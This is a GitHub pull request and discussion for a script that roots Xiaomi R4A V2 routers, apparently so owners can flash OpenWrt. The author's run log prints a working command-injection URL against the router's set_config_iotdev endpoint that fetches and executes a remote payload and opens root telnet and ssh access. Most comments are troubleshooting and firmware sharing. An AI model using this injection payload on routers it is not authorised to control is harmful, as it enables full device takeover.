Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Exploit scripts for the V2 of the Router with Firmware 2.30.20 #155

Open
wants to merge 8 commits into
base: master
Choose a base branch
from

Conversation

LordPinhead
Copy link

Setup I used is router IP 192.168.31.1, computer IP 192.168.31.2, Password for the webinterface is 12345678, these are the default values.

The exploit is based on vanyasem (#141 (comment)) findings and his comment in issue 141.

Start remote_command_execution_vulnerability_v2.py with python3, this will ask for the router ip, the local ip and the webinterface password (default values are set), then it will pack a payload like before, a bootstrapper and it will be injected into the set_config_iotdev url. Basically, remote code execution.

It needs the dropbear and busybox executable plus the script. Because it was so different, I made a new python script and a new bash script.

Now, with root access, the router is also open for OpenWRT.

Thomas Behrend and others added 4 commits October 30, 2022 21:55

Verified

This commit was created on GitHub.com and signed with GitHub’s verified signature. The key has expired.
Testscript not needed

Verified

This commit was created on GitHub.com and signed with GitHub’s verified signature. The key has expired.
Testscript not needed
@ViceEye
Copy link

ViceEye commented Oct 31, 2022

image

I am R4A with Firmware 2.30.28.
I ran the script and got this.

What should I do?

@RadioOperator
Copy link

@ViceEye your Router IP address should be 192.168.31.1, this is xiaomi default router address.

@ViceEye
Copy link

ViceEye commented Oct 31, 2022

@ViceEye your Router IP address should be 192.168.31.1, this is xiaomi default router address.

I change the Router to extender mode, so it can get online (I don't have long cable yet), before I do this, it was not working too

@ViceEye
Copy link

ViceEye commented Oct 31, 2022

image
20221031194650
if the address is incorrect, will show router not found

@RadioOperator
Copy link

RadioOperator commented Oct 31, 2022

@ViceEye seems you are not login to your xiaomi router (192.168.31.1) admin page on a browser before you python3.....

@ViceEye
Copy link

ViceEye commented Oct 31, 2022

I am logged in, on my browser tho, let me retry. Does {"code": 0} mean successful exploit

@RadioOperator
Copy link

{"code": 0}, --- I donot know this.

@ViceEye
Copy link

ViceEye commented Oct 31, 2022

Fixed, found out that WSL cannot do this!!! And this way is working under Windows env, so remove the os check in the script and it's work now

@LordPinhead
Copy link
Author

Wait, you've started the script in the windows linux env? I haven't tried this one tbh.

But we are also talking about a VM when I look at the 172.xxx.xxx.xxx address.

I remove the os check, not a problem, but with VMs, this would be way harder.

Thomas Behrend added 2 commits October 31, 2022 18:19
…g condition if the router starts dropbear fast or slow somehow. The script was extended with logouts into /tmp/exploit.log - the script was executed multiple times in a row without dropping out too soon.
@LordPinhead
Copy link
Author

LordPinhead commented Oct 31, 2022

Also, here is the output of a successfull injection:

/OpenWRTInvasion$ /usr/bin/python3 /media/Dev/git/xiaomi/OpenWRTInvasion/remote_command_execution_vulnerability_v2.py
Router IP address [press enter for using the default '192.168.31.1']: 
Local Host IP address [press enter for using the default '192.168.31.2']: 
Enter router admin password: '12345678']: 
****************
router_ip_address: 192.168.31.1
stok: c2f18d2b84195b1771761ccacbae37ed
****************
local file server is runing on 0.0.0.0:50273. root='build'
start uploading payload file...
exploit url: cd /tmp && curl -s http://192.168.31.2:50273/build/payload.tar.gz > payload.tar.gz && curl -s http://192.168.31.2:50273/bootstrapper_v2.sh > bootstrapper.sh && /bin/ash /tmp/bootstrapper.sh
exploit_code: cd%20%2Ftmp%20%26%26%20curl%20-s%20http%3A%2F%2F192.168.31.2%3A50273%2Fbuild%2Fpayload.tar.gz%20%3E%20payload.tar.gz%20%26%26%20curl%20-s%20http%3A%2F%2F192.168.31.2%3A50273%2Fbootstrapper_v2.sh%20%3E%20bootstrapper.sh%20%26%26%20%2Fbin%2Fash%20%2Ftmp%2Fbootstrapper.sh
exploit_url: http://192.168.31.1/cgi-bin/luci/;stok=c2f18d2b84195b1771761ccacbae37ed/api/misystem/set_config_iotdev?bssid=XXXXXX&user_id=XXXXXX&ssid=-h%0Acd%20%2Ftmp%20%26%26%20curl%20-s%20http%3A%2F%2F192.168.31.2%3A50273%2Fbuild%2Fpayload.tar.gz%20%3E%20payload.tar.gz%20%26%26%20curl%20-s%20http%3A%2F%2F192.168.31.2%3A50273%2Fbootstrapper_v2.sh%20%3E%20bootstrapper.sh%20%26%26%20%2Fbin%2Fash%20%2Ftmp%2Fbootstrapper.sh%0A
192.168.31.1 - - [31/Oct/2022 18:56:31] "GET /build/payload.tar.gz HTTP/1.1" 200 -
192.168.31.1 - - [31/Oct/2022 18:56:31] "GET /bootstrapper_v2.sh HTTP/1.1" 200 -
{"code":0}
stopping local file server
done! Now you can connect to the router using several options: (user: root, password: root)
* telnet 192.168.31.1
* ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 -c 3des-cbc -o UserKnownHostsFile=/dev/null [email protected]
* ftp: using a program like cyberduck

Above the {"code":0} you see the download of the 2 files via HTTP, if this is not showing up, the router could not connect to you.
The box is a bit slow, therefore, I added some logging into the script.sh and extended the wait time and retries for the check of the ssh port. Dropbear takes it's time to start.

Telnet should work as soon as you see the download worked of the 2 files and the script ended, even with an error saying ssh is not open. Try telnet. I executed the exploit multiple times in a row, even with a fresh rebooted router.

@acecilia
Copy link
Owner

acecilia commented Nov 1, 2022

Thanks for this 🔥 Couple of things:

  • I see some duplicated code. Could you try reusing it instead of copy/pasting it?
  • Instead of making a second script, please introduce the changes in the existing script. If needed, ask the user which of the two explotation methods he/she wants to use

@LordPinhead
Copy link
Author

If the original script had been a class I could use or extend from, that would be no problem. But remember, you access variables of the same instance, when I use access the function, the variable will be empty.

And melting everything into one and let people decide is not really a good idea. The users are overwhelmed with the options and setup they have to do right now, knowing which exploit to use would only open more tickets. We could remove your original script, if the other exploit works on older routers too.

@MrTaiKe
Copy link

MrTaiKe commented Nov 2, 2022

@LordPinhead
Thank you very much for your great codes for R4A V2! I am new to OpenWrt. I managed and successfully use your code (commit #99634522) to telnet my XiaoMi R4A Gigabit (RA4Gv2) and flashed OpenWrt 22.03.2 Sysupgrade firmware. I was able to log in Luci Web UI, however I could not find any Wireless on the menu tab.

Unfortunately, I flashed again with the newest SNAPSHOT (r21150-63db906516). @acecilia And now my router starts with a solid orange light and light will be off and on looping forever. IP:192.168.31.1 disappeared.

What I guess is that I need to debrick my device. I have tried 1) Mi Wifi Repair tool, 2) TinyPXE4A. Both methods are NOT successfully debrick my device. I have tried different factory firmwae 2.28.xx and 2.18.28.bin. I guess that the bin file needs to be 2.30.20 for V2, however I cannot find any place where I can download this version of firmware. (There is the 3rd method: micky0867 bootp/tftp-server procedure. However, bootp is not found anywhere to download. I could not try this method.)

I had realized my stupidity and carelessness cost me a lot of effort trying to save this device. and I had concluded to a point to I need your help. and I believe there will be others who will suffer from the same mistakes. With your help, it will help tremendously! Do you think all I need is actually the 2.30.20.bin file? Any direction I could go?

Thank you very much, @LordPinhead @acecilia

@vanyasem
Copy link

vanyasem commented Nov 2, 2022

@MrTaiKe well, there are no official OpenWRT builds for this device - you've flashed an unsupported firmware for a different router, and bricked your device. V1 and V2 are different, and firmwares for them are not compatible. And there is no publicly available stock firmware for this device online as far as I know. I hope you have made a full backup of mt0 before doing the flashing

@MrTaiKe
Copy link

MrTaiKe commented Nov 2, 2022

@MrTaiKe well, there are no official OpenWRT builds for this device - you've flashed an unsupported firmware for a different router, and bricked your device. V1 and V2 are different, and firmwares for them are not compatible. And there is no publicly available stock firmware for this device online as far as I know. I hope you have made a full backup of mt0 before doing the flashing

@vanyasem Thank you for your reply. I understood V1 and V2 are different. I used @LordPinhead's code (commit #99634522) and successfully flash OpenWrt onto it. OpenWrt 22.03.2 Sysupgrade was actually working on this device except WiFi features were missing. I was dumb enough to think SNAPSHOT might contain wireless package, and flashing with latest snapshot which eventually bricked my device :( OH MY GOD, I do not have any mt0. Do you think I can use someone else's mt0, or I will have to just wait for the stock firmware 2.30.20 made publicly available ?

Thank you again

@410252889
Copy link

410252889 commented Nov 2, 2022

@MrTaiKe
R4Av2 2.30.25
小米官方的固件

miwifi_r4av2_all_release_2.30.25.bin.zip

@MrTaiKe
Copy link

MrTaiKe commented Nov 2, 2022

@MrTaiKe R4Av2 2.30.25 小米官方的固件

miwifi_r4av2_all_release_2.30.25.bin.zip

@410252889
WOW! HolyCow, Thank you so much!
哇!非常感谢感谢您,我来试试能不能救回小米

@410252889
Copy link

410252889 commented Nov 2, 2022

@MrTaiKe
Copy link

MrTaiKe commented Nov 2, 2022

@410252889 非常感謝您的幫助, 您是救世主!!
Many Thanks to @410252889 !!! He/she is AMAZING !!!
I have successfully debricked my R4AV2 device using TinyPXE4A flashing 2.30.25.bin he/she provided!
(NOTE: MiWifi Repair tool did NOT work)

@LordPinhead @vanyasem @acecilia
As I mentioned earlier, I successfully flashed R4AV2 device with OpenWrt 22.03.2 Sysupgrade firmware. I was able to logon Web UI, however it was missing the Wireless Tab. I am NOT going to flash the latest SnapShot, but I am willing to try 22.03.2 Sysupgrade again. Before I do so, I would like to ask your insights:

  1. Should I flash 22.03.2 Sysupgrade again? Is it compatible with V2?
  2. If so, do you have any suggestion for missing Wireless Features?

By the way, this is a great community place!
Thanks to @410252889 who is willing to share files and resources with us!!!!
Thank you very much

@RadioOperator
Copy link

@MrTaiKe refer to this #141
The R4Av2 hw seems the same as AC1200/RB02, you should try to find a unofficial build for AC1200/RB02, not use any official fw.

@MrTaiKe
Copy link

MrTaiKe commented Nov 2, 2022

@MrTaiKe refer to this #141
The R4Av2 hw seems the same as AC1200/RB02, you should try to find a unofficial build for AC1200/RB02, not use any official fw.

@RadioOperator Thank you for pointing out the AC1200/RB02. I have read thru the entire thread of #141. Looks like @wbs306 #141 (comment) compiled a new openwrt firmware for R4AV2.

Did anyone try to use @LordPinhead's code (commit #99634522) to flash @wbs306's compiled openwork? @wbs306 would you please point out where I can find your compiled R4AV2 Openwrt? I can test it out.

Btw, in spite to the HW difference between V1 and V2, it is very strange to me that I was able to successfully flash R4AV2 device with OpenWrt 22.03.2 Sysupgrade firmware (as I mention earlier)

@RadioOperator
Copy link

you already know using the official build got the wifi problem because of the different chip.

@MrTaiKe
Copy link

MrTaiKe commented Nov 2, 2022

you already know using the official build got the wifi problem because of the different chip.

Sorry that I am a newbie trying to learn many things in a short time. I kind of got what you saying. So assuming or if the major HW difference are just the WiFi chips, then the official build could be modified just the codings for the wireless chips? I am kind of surprised that I was able to flash it. It seems to me that the system had not changed much except the wireless chips. Correct me if I am wrong? Thanks!

I am guessing that it might retain most of original R4A Hardware except using the AC1200 wireless chips.

Thomas Behrend and others added 2 commits April 12, 2023 18:30

Verified

This commit was created on GitHub.com and signed with GitHub’s verified signature. The key has expired.
@LordPinhead
Copy link
Author

I was offline for some time because I moved into a new home, but I simply moved the script into the original one. The exploit works on every version, even old ones, so it's not wrong. I exploited 8 routers successfully, 2 with real old firmware versions.

@nourymohammadi
Copy link

I really appreciate the amount of work that you guys put in to this project to get the most out of this router. so thank you all for that. but only if the device had a usb port my router would be functional now😁
I really don't undrestand why Xiaomi didn't made any usb port on this router. the SoC capable of two usb3 and usb2 protocols so I decided to find and solder two usb wires but I think I have burned the SoC🙃

router_ip_address = input("Router IP address [press enter for using the default '{}']: ".format(router_ip_address)) or router_ip_address

# get stok
sys.exit("Stopping: script can only be run on a Mac/Linux system")
Copy link
Owner

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Is this intentional? Windows support is being dropped again?

Copy link
Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

If you have a Windows system, remove the code and try it. I have no Windows that was working with it, and when I have to give it to somebody without much knowledge, a live disk in VMWare would be easier.

@@ -50,7 +67,8 @@ def get_stok(router_ip_address):
return None
key = re.findall(r'key: \'(.*)\',', r0.text)[0]
nonce = "0_" + mac + "_" + str(int(time.time())) + "_" + str(random.randint(1000, 10000))
router_password = input("Enter router admin password: ")
router_password = "12345678"
router_password = input("Enter router admin password: '{}']: ".format(router_password)) or router_password
Copy link
Owner

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

What is this hardcoded password?

Copy link
Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

It's not "hardcoded" - it's initialized and a user could change it. I used 12345678 for the tests and with the placeholder, I did not have to enter it all the time.

exploit_cmd += "curl -s http://{}:{}/bootstrapper_v2.sh > bootstrapper.sh && ".format(hosting_ip, http_port_number)
exploit_cmd += "/bin/ash /tmp/bootstrapper.sh".format(hosting_ip, http_port_number, hosting_ip, http_port_number)


Copy link
Owner

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

[detail] Double blank line


if checkHost(router_ip_address, 22):
print("done! Now you can connect to the router using several options: (user: root, password: root)")
print("* telnet {}".format(router_ip_address))
print("* ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 -oHostKeyAlgorithms=+ssh-rsa -c 3des-cbc -o UserKnownHostsFile=/dev/null root@{}".format(router_ip_address))
Copy link
Owner

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Why is oHostKeyAlgorithms=+ssh-rsa gone?

Copy link
Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Why is it needed in the first place? The ssh client does the handshake and got the right cipher and algorithms.

`
debug1: Remote protocol version 2.0, remote software version dropbear

debug1: compat_banner: no match: dropbear

debug1: Authenticating to hella:22 as root

debug1: SSH2_MSG_KEXINIT sent

debug1: SSH2_MSG_KEXINIT received

debug1: kex: algorithm: curve25519-sha256

debug1: kex: host key algorithm: ssh-ed25519

debug1: kex: server->client cipher: [email protected] MAC: compression: none

debug1: kex: client->server cipher: [email protected] MAC: compression: none

debug1: expecting SSH2_MSG_KEX_ECDH_REPLY

debug1: SSH2_MSG_KEX_ECDH_REPLY received

debug1: Server host key: ssh-ed25519 SHA256:vFou7A4lAJIvzCPMb1ds1Eve7pMZ2z4YNDGTpz48S+4

debug1: Host hella is known and matches the ED25519 host key.
`

@youningnihaobang
Copy link

Wait, you've started the script in the windows linux env? I haven't tried this one tbh.

But we are also talking about a VM when I look at the 172.xxx.xxx.xxx address.

I remove the os check, not a problem, but with VMs, this would be way harder.

running successful on Windows!
As it will end immediately, a time.sleep() function needs to be add after the get() function.
image
image

@kokutoukiritsugu
Copy link

kokutoukiritsugu commented Jun 29, 2023

发2个 小米路由器4A千兆版v2(r4ag v2) 新版本固件地址:

http://cdn.cnbj1.fds.api.mi-img.com/xiaoqiang/rom/r4av2/miwifi_r4av2_firmware_release_2.30.28.bin

https://cdn.cnbj1.fds.api.mi-img.com/xiaoqiang/rom/r4av2/miwifi_r4av2_firmware_6bdd4_2.30.500.bin

2023.06.29 测试 小米路由器4A千兆版v2(r4ag v2) 新版本固件 2.30.500 也可以解锁ssh
1 路由器恢复出厂.
2 拔掉电脑和路由器所有网线, 关闭防火墙, 仅仅有路由器一根网线连接到电脑.
3 初始化设置路由器, 上网模式DHCP, 密码设置 12345678
4 运行漏洞脚本 https://github.com/LordPinhead/OpenWRTInvasion
5 第一次可能不行, 再运行一次即可.

Snipaste_2023-06-29_21-22-46

Snipaste_2023-06-29_21-23-34

@kokutoukiritsugu
Copy link

kokutoukiritsugu commented Jun 29, 2023

小米路由器4A千兆版v2(r4ag v2)官方snapshots固件可以用, 但是5g wifi只有3db, 改几次5g参数WiFi就会消失需要重启路由器.

https://downloads.openwrt.org/snapshots/targets/ramips/mt7621/openwrt-ramips-mt7621-xiaomi_mi-router-4a-gigabit-v2-squashfs-sysupgrade.bin

@bibarub
Copy link

bibarub commented Jul 7, 2023

this exploit doesn't work on r4acv2, but the current one does. it'd be incorrect to completely replace the current exploit

@ali20042004
Copy link

ali20042004 commented Jul 9, 2023

whene I use this exploit only by input the stock adreess ( dose'nt work by ip address) , that show every thing is corect , but i could not conect by cyber to upload openwrt image to my router to continue the process
my roter is R4a gigabite edition chinai 2.30.500

@ali20042004
Copy link

Fixed, found out that WSL cannot do this!!! And this way is working under Windows env, so remove the os check in the script and it's work now

hi bro can you discibe that how ?
can you upload the edite file?
thanks

@LordPinhead
Copy link
Author

发2个 小米路由器4A千兆版v2(r4ag v2) 新版本固件地址:

http://cdn.cnbj1.fds.api.mi-img.com/xiaoqiang/rom/r4av2/miwifi_r4av2_firmware_release_2.30.28.bin

https://cdn.cnbj1.fds.api.mi-img.com/xiaoqiang/rom/r4av2/miwifi_r4av2_firmware_6bdd4_2.30.500.bin

2023.06.29 测试 小米路由器4A千兆版v2(r4ag v2) 新版本固件 2.30.500 也可以解锁ssh 1 路由器恢复出厂. 2 拔掉电脑和路由器所有网线, 关闭防火墙, 仅仅有路由器一根网线连接到电脑. 3 初始化设置路由器, 上网模式DHCP, 密码设置 12345678 4 运行漏洞脚本 https://github.com/LordPinhead/OpenWRTInvasion 5 第一次可能不行, 再运行一次即可.

Snipaste_2023-06-29_21-22-46

Snipaste_2023-06-29_21-23-34

This is something I could not find out why this happens. Sometimes, the Dropbear SSH Server takes too long to start and even with a pause of 3 minutes, the connection was unsuccessful. But with the second time it works. Even on a shell I couldn't see why it behaves like this.

this exploit doesn't work on r4acv2, but the current one does. it'd be incorrect to completely replace the current exploit

But I have the V2 and it worked.

grafik

3 of them and they had the 2.30.20 Firmware with the exploit.

If you have a newer one in which this one is fixed and the other one works, my first one would be the best option, even when the code is doubled. Or somebody has the time to make modules and remove the double code from the scripts, I don't have it.

@ali20042004
Copy link

ali20042004 commented Jul 9, 2023

发2个 小米路由器4A千兆版v2(r4ag v2) 新版本固件地址:
http://cdn.cnbj1.fds.api.mi-img.com/xiaoqiang/rom/r4av2/miwifi_r4av2_firmware_release_2.30.28.bin
https://cdn.cnbj1.fds.api.mi-img.com/xiaoqiang/rom/r4av2/miwifi_r4av2_firmware_6bdd4_2.30.500.bin
2023.06.29 测试 小米路由器4A千兆版v2(r4ag v2) 新版本固件 2.30.500 也可以解锁ssh 1 路由器恢复出厂. 2 拔掉电脑和路由器所有网线, 关闭防火墙, 仅仅有路由器一根网线连接到电脑. 3 初始化设置路由器, 上网模式DHCP, 密码设置 12345678 4 运行漏洞脚本 https://github.com/LordPinhead/OpenWRTInvasion 5 第一次可能不行, 再运行一次即可.
Snipaste_2023-06-29_21-22-46
Snipaste_2023-06-29_21-23-34

This is something I could not find out why this happens. Sometimes, the Dropbear SSH Server takes too long to start and even with a pause of 3 minutes, the connection was unsuccessful. But with the second time it works. Even on a shell I couldn't see why it behaves like this.

this exploit doesn't work on r4acv2, but the current one does. it'd be incorrect to completely replace the current exploit

But I have the V2 and it worked.

grafik

3 of them and they had the 2.30.20 Firmware with the exploit.

If you have a newer one in which this one is fixed and the other one works, my first one would be the best option, even when the code is doubled. Or somebody has the time to make modules and remove the double code from the scripts, I don't have it.

My R4A gigabite edition flash is Winboard 250128JVSQ
can I install openwrt in this device?

@majesus18
Copy link

majesus18 commented Jul 10, 2023

Edit:
Wow, after I posted this, I solved my issue. If you are having troubles as I'm stating below in VM. Make sure VMware network is bridged, not NAT. Let the router assign the VM its own IP. Problem was solved.


Man, I have been trying for days to get telnet working. I have Xiaomi 4A Gigabit V2, chinese version. Updated it to the latest firmware 2.30.500 and followed everyone posts. I am running the scripts through VM linux Ubuntu. The script grabs the stok, but the script just won't work to enable telnet.
Photo below shows me doing it with the VM linux provided IP address of 10.0.2.15. I have also tried it with the host IP address which was 192.168.31.18. Still not luck.
Anyways suggestion what I am doing wrong?
2023-07-10_13-05-49
2023-07-10_13-06-16

@ali20042004
Copy link

Edit: Wow, after I posted this, I solved my issue. If you are having troubles as I'm stating below in VM. Make sure VMware network is bridged, not NAT. Let the router assign the VM its own IP. Problem was solved.

Man, I have been trying for days to get telnet working. I have Xiaomi 4A Gigabit V2, chinese version. Updated it to the latest firmware 2.30.500 and followed everyone posts. I am running the scripts through VM linux Ubuntu. The script grabs the stok, but the script just won't work to enable telnet. Photo below shows me doing it with the VM linux provided IP address of 10.0.2.15. I have also tried it with the host IP address which was 192.168.31.18. Still not luck. Anyways suggestion what I am doing wrong? 2023-07-10_13-05-49 2023-07-10_13-06-16

i check this script in both system ( in linux pc & vm run in windows). but unfortunetly has not worked yet :(

@bibarub
Copy link

bibarub commented Jul 12, 2023

But I have the V2 and it worked.

that's r4a gigabit (r4av2?), and i have the regular r4a (r4acv2)

@ali20042004
Copy link

lastly I can do it
it need download openwrtinvasion in your local system , then run scrip ;)

Djfe pushed a commit to Djfe/openwrt that referenced this pull request Jul 22, 2023
Device is the same as Xiaomi Mi Router 4A Gigabit, except of:
- 5G WiFi is MT7663
- addresses of leds, wifi and eth ports are slightly changed

Specs:
  SoC:  MT7621
  CPU:  2 x 880 MHz
  ROM:  16 MB
  RAM:  128 MB
  WLAN: MT7603, MT7663

MAC addresses:
  WAN     ****  factory 0xe006 (label)
  LAN     *:f7  factory 0xe000
  2.4 GHz *:f8  factory 0x0000+0x4 (mtd-eeprom+0x4)
  5 GHz   *:f9  factory 0x8000+0x4 (mtd-eeprom+0x4)

Installation:

Factory firmware is based on a custom OpenWrt 17.x.
Installation is the same as for Xiaomi Mi Router 4A Gigabit.

Probably the easiest way to install is to use the script from
this repository: acecilia/OpenWRTInvasion#155

In a more advanced case, you can do everything yourself:
- gain access to the device through one of the exploits described
  in the link above
- upload sysupgrade image to /tmp
- overwrite stock firmware:
  # mtd -e OS1 -r write /tmp/sysupgrade.bin OS1

Recovery:

Recovery procedure is the same as for Xiaomi Mi Router 4A Gigabit.
Possible options can be found here:
https://openwrt.org/inbox/toh/xiaomi/xiaomi_mi_router_4a_gigabit_edition

One of the ways is to use another router with OpenWrt:
- connect both routers by their LAN ports
- download stock firmware from [1]
- place it inside /tmp/test.bin on the main router
- configure PXE/TFTP on the main router
- power off 4Av2, hold Reset button, power on
- as soon as image download via TFTP starts, Reset can be released
- blinking blue wan LED will indicate the end of the flashing process,
  now router can be rebooted
[1] http://cdn.cnbj1.fds.api.mi-img.com/xiaoqiang/rom/r4av2/miwifi_r4av2_firmware_release_2.30.28.bin

Signed-off-by: Dmitry Sokolov <[email protected]>
(cherry picked from commit 39e4f03)
@AQdarkness
Copy link

hello everyone . I have R4AGv2 with 2.30.25 firmware . How can I install openwrt on my router ? is this possible or not because in openwrt site I see this : Warning 10/2022 Xiaomi is currently shipping v2 of the 4A Gigabit Edition, it's identifiable by fw version 2.30.20, and the name when assigned an IP from a DHCP (not your ISPs) via the WAN port, MiWiFi-R4AV2. This model cannot be flashed with Openwrt.

@sweihub
Copy link

sweihub commented Oct 25, 2023

特别感谢 @kokutoukiritsugu ,用这个方法,成功解锁 telnet/ssh,需要严格按阁下提供的操作步骤,我的步骤如下,供大家参考

  1. 升级小米路由器4A千兆版固件,从2.30.28升级到2.30.500
  2. 升级完成之后,再重置路由器(重要❗️)
  3. 配置路由器的密码为12345678
  4. 再按阁下提供的步骤,注意使用解锁脚本:https://github.com/LordPinhead/OpenWRTInvasion ,非本站脚本
  5. 多运行几次解锁脚本,我大概运行了5~6次,成功!

发2个 小米路由器4A千兆版v2(r4ag v2) 新版本固件地址:

http://cdn.cnbj1.fds.api.mi-img.com/xiaoqiang/rom/r4av2/miwifi_r4av2_firmware_release_2.30.28.bin

https://cdn.cnbj1.fds.api.mi-img.com/xiaoqiang/rom/r4av2/miwifi_r4av2_firmware_6bdd4_2.30.500.bin

2023.06.29 测试 小米路由器4A千兆版v2(r4ag v2) 新版本固件 2.30.500 也可以解锁ssh
1 路由器恢复出厂.
2 拔掉电脑和路由器所有网线, 关闭防火墙, 仅仅有路由器一根网线连接到电脑.
3 初始化设置路由器, 上网模式DHCP, 密码设置 12345678
4 运行漏洞脚本 https://github.com/LordPinhead/OpenWRTInvasion
5 第一次可能不行, 再运行一次即可.

Snipaste_2023-06-29_21-22-46

Snipaste_2023-06-29_21-23-34

@webysther
Copy link

webysther commented Apr 8, 2024

Just a really important information, I received a device with 2.30.500 and don't work not matter what, I see the default DHCP range was changed to use high port, change to use this and you are good to go:

image

image

image

Maybe make sense to verify the machine IP and show a warning?

  • If the IP inst 192.168.31.1/24
  • The IP is > 192.168.31.5

@ghostplant
Copy link

Edit: Wow, after I posted this, I solved my issue. If you are having troubles as I'm stating below in VM. Make sure VMware network is bridged, not NAT. Let the router assign the VM its own IP. Problem was solved.

Man, I have been trying for days to get telnet working. I have Xiaomi 4A Gigabit V2, chinese version. Updated it to the latest firmware 2.30.500 and followed everyone posts. I am running the scripts through VM linux Ubuntu. The script grabs the stok, but the script just won't work to enable telnet. Photo below shows me doing it with the VM linux provided IP address of 10.0.2.15. I have also tried it with the host IP address which was 192.168.31.18. Still not luck. Anyways suggestion what I am doing wrong? 2023-07-10_13-05-49 2023-07-10_13-06-16

I failed forever like this as well. But after doing a change in remote_command_execution_vulnerability_v2.py, by adding:

    with web_server:
        # upload and execute payload
        print("start uploading payload file...")
        payload_download = requests.get(create_exploit_url(web_server.port))
        print(payload_download.text)
+       import time
+       time.sleep(5)

Then it works. So looks like my PC is too fast and making the service quits too early.

@xtrymind
Copy link

xtrymind commented Jun 2, 2024

Script work flawlessly on Mi Router AC1200 RB02 with international firmware 3.0.61
Screenshot 2024-06-02 125241

@sensiblepuffin
Copy link

@webysther's suggestion (changing DHCP pool) combined with using LordPinhead's latest worked perfectly on the exploit side.

Weirdly, ftp refused to let me push the firmware to /tmp, but I was able to get in via telnet and then wget the payload instead.

@webysther
Copy link

@webysther's suggestion (changing DHCP pool) combined with using LordPinhead's latest worked perfectly on the exploit side.

Weirdly, ftp refused to let me push the firmware to /tmp, but I was able to get in via telnet and then wget the payload instead.

Great! About FTP, for me only works telnet also.

@f1sherb0y
Copy link

发2个 小米路由器4A千兆版v2(r4ag v2) 新版本固件地址:

http://cdn.cnbj1.fds.api.mi-img.com/xiaoqiang/rom/r4av2/miwifi_r4av2_firmware_release_2.30.28.bin

https://cdn.cnbj1.fds.api.mi-img.com/xiaoqiang/rom/r4av2/miwifi_r4av2_firmware_6bdd4_2.30.500.bin

2023.06.29 测试 小米路由器4A千兆版v2(r4ag v2) 新版本固件 2.30.500 也可以解锁ssh 1 路由器恢复出厂. 2 拔掉电脑和路由器所有网线, 关闭防火墙, 仅仅有路由器一根网线连接到电脑. 3 初始化设置路由器, 上网模式DHCP, 密码设置 12345678 4 运行漏洞脚本 https://github.com/LordPinhead/OpenWRTInvasion 5 第一次可能不行, 再运行一次即可.

Snipaste_2023-06-29_21-22-46

Snipaste_2023-06-29_21-23-34

2024.7.21 Mi Router 4 Gigabit Version 2, Firmware version 2.30.500 works.

@DmitryBLKV
Copy link

DmitryBLKV commented Aug 18, 2024

Issue: SSH connection not working after script execution

Hi,

I’m experiencing issues when trying to run the OpenWRT Invasion script on my Xiaomi Mi Router 4A Gigabit Edition (Firmware version 2.30.500).

After executing the script, I receive the following message:

`dmitrybelyakov@dmitry-5 OpenWRTInvasion % python3 remote_command_execution_vulnerability.py
/Users/dmitrybelyakov/Library/Python/3.9/lib/python/site-packages/urllib3/init.py:35: NotOpenSSLWarning: urllib3 v2 only supports OpenSSL 1.1.1+, currently the 'ssl' module is compiled with 'LibreSSL 2.8.3'. See: urllib3/urllib3#3020
warnings.warn(
Router IP address [press enter for using the default 'miwifi.com']:
Enter router admin password:
There two options to provide the files needed for invasion:

  1. Use a local TCP file server runing on random port to provide files in local directory script_tools.
  2. Download needed files from remote github repository. (choose this option only if github is accessable inside router device.)
    Which option do you prefer? (default: 1)

router_ip_address: miwifi.com
stok: 58c52d49be63014309e89ba7c3104bb4
file provider: local file server


start uploading config file...
start exec command...
local file server is runing on 0.0.0.0:61529. root='script_tools'
Warning: the process has finished, but seems like ssh connection to the router is not working as expected.

I've tried using Telnet, but I'm getting "Connection refused".

Does anyone have any advice on how to resolve this, or is there something specific I should check with my router's firmware version?

Thanks for your help!

image

@JohnTheCoolingFan
Copy link

@DmitryBLKV have you tried running the script again? In my case that helped and on the next iteration it worked.

@justbendev
Copy link

Unfortunately this is patched for 3.0.129 on Xiaomi 4A (Global)
The endpoint itself have been removed.

No page is registered at '/api/misystem/set_config_iotdev'.
If this url belongs to an extension, make sure it is properly installed.
If the extension was recently installed, try removing the /tmp/luci-indexcache file.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

Successfully merging this pull request may close these issues.

None yet